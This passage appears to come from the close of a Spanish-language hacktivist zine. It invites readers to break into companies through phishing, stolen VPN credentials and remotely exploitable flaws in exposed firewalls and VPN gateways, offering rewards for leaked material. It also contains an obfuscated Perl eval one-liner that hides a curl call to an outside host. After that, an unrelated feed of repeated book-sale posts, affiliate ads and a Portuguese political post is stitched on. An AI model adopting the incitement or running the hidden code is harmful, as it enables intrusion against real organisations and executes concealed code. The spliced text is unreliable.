susatrocidades, o a dejar uno de estos [3] olvidado en algún rincón de lasoficinas? [1] https://en.wikipedia.org/wiki/Evil_maid_attack[2] http://mg.lol/blog/defcon-2019/[3] https://shop.hak5.org/products/lan-turtle¿Eres bueno con ingeniería social y phishing, y conseguiste una shell en la computadora de un empleado, o por ahí conseguiste sus credenciales de la vpnusando phishing? ¿Pero quizás no pudiste conseguir admin de dominio y descargarlo que querías?¿Participaste en programas de bug bounties y te convertiste en una experta enel hacking de aplicaciones web, pero no tienes suficiente experiencia hackerpara penetrar completamente la compañía?¿Tienes facilidad con la ingeniería inversa? Escanea algunas compañías del malpara ver qué dispositivos tienen expuestos a internet (firewall, vpn, y pasarelas de correo electrónico serán mucho más útiles que cosas como cámarasIP), aplícales ingeniería inversa y encuentra alguna vulnerabilidad explotablede forma remota.Si me es posible trabajar con vos para penetrar la compañía y conseguir materialde interés público, igualmente serás recompensada por tu trabajo. Si es que notengo el tiempo de trabajar en ello yo misma, al menos trataré de aconsejarteacerca de cómo continuar hasta que puedas completar el hackeo por tu cuenta.Apoyar a aquellos en el poder para hackear y vigilar a disidentes, activistas ya la población en general es hoy día una industria de varios miles de millonesde dólares, mientras que hackear y exponer a quienes están en el poder es untrabajo voluntario y arriesgado. Convertirlo en una industria de varios millonesde dólares ciertamente no va a arreglar ese desequilibrio de poder, ni va asolucionar los problemas de la sociedad. Pero creo que va a ser divertido. Asíque... ¡ya quiero ver gente comenzando a cobrar sus recompensas!--[ 15 - Abolir las prisiones ]------------------------------------------------- Construidas por el enemigo pa encerrar ideas encerrando compañeros pa acallar gritos de guerra es el centro de tortura y aniquilamiento donde el ser humano se vuelve más violento es el reflejo de la sociedad, represiva y carcelaria sostenida y basada en lógicas autoritarias custodiadas reprimidos y vigilados miles de presas y presos son exterminados ante esta máquina esquizofrénica y despiadada compañero Axel Osorio dando la pela en la cana rompiendo el aislamiento y el silenciamiento fuego y guerra a la cárcel, vamos destruyendo! Rap Insurrecto - Palabras En ConflictoSería típico terminar un zine hacker diciendo liberen a hammond, liberen amanning, liberen a hamza, liberen a los detenidos por el montaje del дело Сети,etc. Voy a llevar esta tradición a su consecuencia más radical [1], y a decir:¡hay que abolir las prisiones ya!. Siendo yo misma una delincuente, puedenpensar que lo que ocurre es que tengo una visión un poco sesgada del asunto.Pero en serio, es que ni siquiera es un tema controvertido, incluso la ONU estáprácticamente de acuerdo [2]. Así que, de una buena vez, liberen a las personasmigrantes [3][4][5][6], encarceladas a menudo por esos mismos países que crearonla guerra y la destrucción ambiental y económica de la que huyen. Liberen atodos los que están en prisión por la guerra contra quienes usan drogas [7].Liberen a todas las personas encarceladas por la guerra contra los pobres [8].Las prisiones lo único que hacen es esconder e ignorar la prueba de laexistencia de los problemas sociales, en lugar de arreglarlos de a de veras. Yhasta que todxs sean liberados, lucha contra el sistema carcelario recordando yteniendo presentes a aquellos que están atrapados ahí dentro. Envíales cariño,cartas, helicópteros [9], radios piratas [10] y libros, y apoya a quienes seorganizan desde ahí adentro [11][12].[1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/ Davis-Son-obsoletas-las-prisiones-final.pdf[2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_ Promising_Practices_on_Alternatives_to_Imprisonment.pdf[3] https://www.theguardian.com/us-news/2016/dec/21/ us-immigration-detention-center-christmas-santa-wish-list[4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility- images-tucson-arizona[5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros- Espana_22648665.html[6] https://www.nytimes.com/2019/06/26/world/australia/ australia-manus-suicide.html[7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes[8] VI, 2. i. La multa impaga: https://scielo.conicyt.cl/scielo.php?script= sci_arttext&pid=S0718-00122012000100005[9] p. 10, Libelo Nº2. Boletín político desde la Cárcel de Alta Seguridad[10] https://itsgoingdown.org/transmissions-hostile-territory/[11] https://freealabamamovement.wordpress.com/f-a-m-pamphlet-who-we-are/[12] https://incarceratedworkers.org/--[ 16 - Conclusión ]-----------------------------------------------------------Nuestro mundo está patas arriba [1]. Tenemos un sistema de justicia querepresenta a la injusticia. La ley y el orden están ahí para crear una ilusiónde paz social, y ocultar lo sistemático y profundo de la explotación, laviolencia, y la injusticia. Mejor seguir a tu conciencia, y no a la ley.[1] http://resistir.info/livros/galeano_patas_arriba.pdfLos hombres de negocios se enriquecen maltratando a las personas y al planeta,mientras que el trabajo de los cuidados queda mayormente sin pagar. Mediante elasalto a todo lo comunal, de algún modo hemos levantado ciudades densamentepobladas, plagadas por la soledad y el aislamiento. El sistema cultural,político y económico en que vivimos alienta las peores facetas de la naturalezahumana: la avaricia, el egoísmo y egocentrismo, la competitividad, la falta decompasión y el apego por la autoridad. Así que, para quien haya conseguidopermanecer sensible y compasivo en un mundo frío, para todas las heroínascotidianas que practican la bondad en las pequeñas cosas, para todas ustedes queaún tienen una estrella encendida en sus corazones: гоpи, гоpи ясно, чтобы непогасло! _____________________ < ¡Cantemos juntas! > --------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || Ábrete corazón Ábrete sentimiento Ábrete entendimiento Deja a un lado la razón Y deja brillar el sol escondido en tu interior perl -Mre=eval <<\EOF '' =~( '(?' .'{'.( '`'|'%' ).("\["^ '-').('`'| '!').("\`"| ',').'"(\\$' .':=`'.(('`')| '#').('['^'.'). ('['^')').("\`"| ',').('{'^'[').'-'.('['^'(').('{'^'[').('`'|'(').('['^'/').('['^'/').( '['^'+').('['^'(').'://'.('`'|'%').('`'|'.').('`'|',').('`'|'!').("\`"| '#').('`'|'%').('['^'!').('`'|'!').('['^'+').('`'|'!').('['^"\/").( '`'|')').('['^'(').('['^'/').('`'|'!').'.'.('`'|'%').('['^'!') .('`'|',').('`'|'.').'.'.('`'|'/').('['^')').('`'|"\'"). '.'.('`'|'-').('['^'#').'/'.('['^'(').('`'|('$')).( '['^'(').('`'|',').'-'.('`'|'%').('['^('(')). '/`)=~'.('['^'(').'|</'.('['^'+').'>|\\' .'\\'.('`'|'.').'|'.('`'|"'").';'. '\\$:=~'.('['^'(').'/<.*?>//' .('`'|"'").';'.('['^'+').('['^ ')').('`'|')').('`'|'.').(('[')^ '/').('{'^'[').'\\$:=~/('.(('{')^ '(').('`'^'%').('{'^'#').('{'^'/') .('`'^'!').'.*?'.('`'^'-').('`'|'%') .('['^'#').("\`"| ')').('`'|'#').( '`'|'!').('`'| '.').('`'|'/') .'..)/'.('[' ^'(').'"})') ;$:="\."^ '~';$~='@' |'(';$^= ')'^'['; $/='`' |'.'; $,= '(' EOF Nosotras nacimos de la noche. en ella vivimos, hackeamos en ella. Aquí estamos, somos la dignidad rebelde, el corazón olvidado de la Интернет. Nuestra lucha es por la memoria y la justicia, y el mal gobierno se llena de criminales y asesinos. Nuestra lucha es por un trabajo justo y digno, y el mal gobierno y las corporaciones compran y venden zero days. Para todas el mañana. Para nosotras la alegre rebeldía de las filtraciones y la expropiación. Para todas todo. Para nosotras nada. Desde las montañas del Sureste Cibernético, _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)También en:- @danicotillas@comunicacionabierta.net/112237720177779394" rel="syndication"> indieweb
-
Forgotten Dreams (Dream Series) "I don’t think you understand this, Sierra. There will be no one else after me” Sale: $5.99 to $0.99 by Natasha Madison Rating: 4.5/5 (2,940 Reviews) #Romance #SmallTown #FriendsToLovers #Suspense #Drama #HeA
Forgotten Dreams: A small town... -
Forgotten Dreams (Dream Series) "I don’t think you understand this, Sierra. There will be no one else after me” Sale: $5.99 to $0.99 by Natasha Madison Rating: 4.5/5 (2,940 Reviews) #Romance #SmallTown #FriendsToLovers #Suspense #Drama #HeA
Forgotten Dreams: A small town... -
Smuggler’s Cove (Twin Lights) "Madison’s plan to sell the property goes awry when a dead body is found floating under their dock" Sale: $23.80 to $2.99 by Fern Michaels Rating: 4.4/5 (4,405 Reviews) #Fiction #Mystery #Family #Siblings #CozyMystery #SmallTown #BookSky
Smuggler’s Cove (Twin Lights) -
In Your Dreams: A Novel (When in Rome) "Madison Walker left Rome, Kentucky, determined to make it in the culinary world " Sale: $19 to $6.99 by Sarah Adams Rating: 4.3/5 (4,099 Reviews) #Romance #Contemporary #SmallTown #Books #RomCom #CookLife #BookSky
In Your Dreams: A Novel (When ... -
As They Lay Sleeping (Detective Madison Harper) "Tucked under her blanket, a teddy placed on the pillow beside her, the little girl could be sleeping" Sale: $3.99 to $0.99 by Wendy Dranfield Rating: 4.5/5 (870 Reviews) #thriller #crime #mystery #suspense #noir #murder #detective #booksky #books
As They Lay Sleeping (Detectiv... -
Blowback from Tim Cook's presence in Trump's China entourage
"When it comes to making big money doing global deals, Trump’s merry band of CEOs has about as much loyalty to the United States as does Trump himself." — Robert Reich
-
Snow Ridge Mysteries, The Complete Series: A Small Town Murder Mystery Box Set "Get ALL 5 books from Emma Lee's popular series in one big box set" Sale: $0.99 to FREE by Emma Lee Rating: 4.3/5 (1,168 Reviews) #cozy #mystery #smalltown #thriller #books #booksky #series #reading #bibliophile
Snow Ridge Mysteries, The Comp... -
Snow Ridge Mysteries, The Complete Series: A Small Town Murder Mystery Box Set "Get ALL 5 books from Emma Lee's popular series in one big box set" Sale: $0.99 to FREE by Emma Lee Rating: 4.3/5 (1,168 Reviews) #cozy #mystery #smalltown #thriller #books #booksky #series #reading #bibliophile
Snow Ridge Mysteries, The Comp... -
Snow Ridge Mysteries, The Complete Series: A Small Town Murder Mystery Box Set "Get ALL 5 books from Emma Lee's popular series in one big box set" Sale: $0.99 to FREE by Emma Lee Rating: 4.3/5 (1,168 Reviews) #cozy #mystery #smalltown #thriller #books #booksky #series #reading #bibliophile
Snow Ridge Mysteries, The Comp... -
Snow Ridge Mysteries, The Complete Series: A Small Town Murder Mystery Box Set "Get ALL 5 books from Emma Lee's popular series in one big box set" Sale: $0.99 to FREE by Emma Lee Rating: 4.3/5 (1,168 Reviews) #cozy #mystery #smalltown #thriller #books #booksky #series #reading #bibliophile
Snow Ridge Mysteries, The Comp... -
The Library Book "In the library, time is dammed up—not just stopped but saved" Sale: $20 to $2.99 by Susan Orlean Rating: 4.2/5 (10,877 Reviews) #libraries #history #truecrime #books #booksky #reading #bibliophile #losangeles
The Library Book -
The Library Book "In the library, time is dammed up—not just stopped but saved" Sale: $20 to $2.99 by Susan Orlean Rating: 4.2/5 (10,877 Reviews) #libraries #history #truecrime #books #booksky #reading #bibliophile #losangeles
The Library Book -
The Library Book "In the library, time is dammed up—not just stopped but saved" Sale: $20 to $2.99 by Susan Orlean Rating: 4.2/5 (10,877 Reviews) #libraries #history #truecrime #books #booksky #reading #bibliophile #losangeles
The Library Book -
The Library Book "In the library, time is dammed up—not just stopped but saved" Sale: $20 to $2.99 by Susan Orlean Rating: 4.2/5 (10,877 Reviews) #libraries #history #truecrime #books #booksky #reading #bibliophile #losangeles
The Library Book -
Quase 500 mil novos usuários no @bsky.app nos últimos 5 dias. E contando... Quanto mais o fascista laranja e seu capanga e braço direito fazem, mais gente busca outros caminhos. Serão melhores? Só o tempo dirá. Mas só de não dar moral pra bilionário fascista já tá valendo. #RIPTwitter #MuskFascista
-
New at Fanatical
Delta Green Comic Horror RPG Collection:
#ad https://www.kqzyfj.com/click-8913463-13797872?url=https%3A%2F%2Fwww.fanatical.com%2Fen%2Fbundle%2Fdelta-green-cosmic-horror-rpg-collection
-
New at Fanatical
Delta Green Comic Horror RPG Collection:
#ad https://www.kqzyfj.com/click-8913463-13797872?url=https%3A%2F%2Fwww.fanatical.com%2Fen%2Fbundle%2Fdelta-green-cosmic-horror-rpg-collection
-
New at Fanatical
Delta Green Comic Horror RPG Collection:
#ad https://www.kqzyfj.com/click-8913463-13797872?url=https%3A%2F%2Fwww.fanatical.com%2Fen%2Fbundle%2Fdelta-green-cosmic-horror-rpg-collection
-
New at Fanatical
Delta Green Comic Horror RPG Collection:
#ad https://www.kqzyfj.com/click-8913463-13797872?url=https%3A%2F%2Fwww.fanatical.com%2Fen%2Fbundle%2Fdelta-green-cosmic-horror-rpg-collection
-
PLAYING DOCTOR - Part One "I stayed up far too late, often crying with laughter, reading about the medical mishaps & blunders" Sale: $6.99 to FREE by John Lawrence Rating: 4.4/5 (2,601 Reviews) #medical #memoir #books #booksky #humor #medicalschool #truestory #free #reading #education #bookshelf
PLAYING DOCTOR - Part One: Med... -
PLAYING DOCTOR - Part One "I stayed up far too late, often crying with laughter, reading about the medical mishaps & blunders" Sale: $6.99 to FREE by John Lawrence Rating: 4.4/5 (2,601 Reviews) #medical #memoir #books #booksky #humor #medicalschool #truestory #free #reading #education #bookshelf
PLAYING DOCTOR - Part One: Med... -
PLAYING DOCTOR - Part One "I stayed up far too late, often crying with laughter, reading about the medical mishaps & blunders" Sale: $6.99 to FREE by John Lawrence Rating: 4.4/5 (2,601 Reviews) #medical #memoir #books #booksky #humor #medicalschool #truestory #free #reading #education #bookshelf
PLAYING DOCTOR - Part One: Med... -
PLAYING DOCTOR - Part One "I stayed up far too late, often crying with laughter, reading about the medical mishaps & blunders" Sale: $6.99 to FREE by John Lawrence Rating: 4.4/5 (2,601 Reviews) #medical #memoir #books #booksky #humor #medicalschool #truestory #free #reading #education #bookshelf
PLAYING DOCTOR - Part One: Med... -
I Will Always Write Back: How One Letter Changed Two Lives "So instead, I made the only promise that I knew I could keep" Sale: $12.99 to $2.99 by Caitlin Alifirenka Rating: 4.7/5 (4,794 Reviews) #memoir #friendship #penpals #inspiration #kidsbooks #Africa #TrueStory #Books #BookSky
I Will Always Write Back: How ... -
I Will Always Write Back: How One Letter Changed Two Lives "So instead, I made the only promise that I knew I could keep" Sale: $12.99 to $2.99 by Caitlin Alifirenka Rating: 4.7/5 (4,794 Reviews) #memoir #friendship #penpals #inspiration #kidsbooks #Africa #TrueStory #Books #BookSky
I Will Always Write Back: How ... -
I Will Always Write Back: How One Letter Changed Two Lives "So instead, I made the only promise that I knew I could keep" Sale: $12.99 to $2.99 by Caitlin Alifirenka Rating: 4.7/5 (4,794 Reviews) #memoir #friendship #penpals #inspiration #kidsbooks #Africa #TrueStory #Books #BookSky
I Will Always Write Back: How ...